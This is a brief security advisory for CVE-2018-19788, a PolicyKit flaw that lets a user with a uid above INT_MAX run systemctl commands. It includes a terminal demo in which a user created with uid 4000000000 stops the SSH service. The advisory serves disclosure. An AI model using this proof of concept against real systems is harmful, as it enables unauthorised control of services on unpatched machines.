Critical vulnerability on policykit of systemd

[CVE-2018-19788]: A flaw was found in PolicyKit (aka polkit 0.115) that allows a user with a uid greater than INT_MAX to successfully execute any systemctl command.

https://github.com/systemd/systemd/issues/11026
https://github.com/freedesktop/polkit/blob/8c1bc8a/src/programs/pkttyagent.c#L156
https://gitlab.freedesktop.org/polkit/polkit/issues/74

Find out more about CVE-2018-19788 from the MITRE CVE dictionary and NIST NVD

DEMO

root@ahihi:~# useradd -u 4000000000 wtf
root@ahihi:~# su - wtf
No directory, logging in with HOME=/

$ whoami
wtf
$ id
uid=4000000000(wtf) gid=1002(wtf) groups=1002(wtf)

$ systemctl stop sshd.service

(process:22860): GLib-GObject-WARNING **: value "-294967296" of type 'gint' is invalid or out of range for property 'uid' of type 'gint'
**
ERROR:pkttyagent.c:175:main: assertion failed: (polkit_unix_process_get_uid (POLKIT_UNIX_PROCESS (subject)) >= 0)

root@ahihi:~# systemctl status sshd.service
...
Dec 05 15:38:39 ahihi systemd[1]: Stopping OpenBSD Secure Shell server...
Dec 05 15:38:39 ahihi systemd[1]: Stopped OpenBSD Secure Shell server.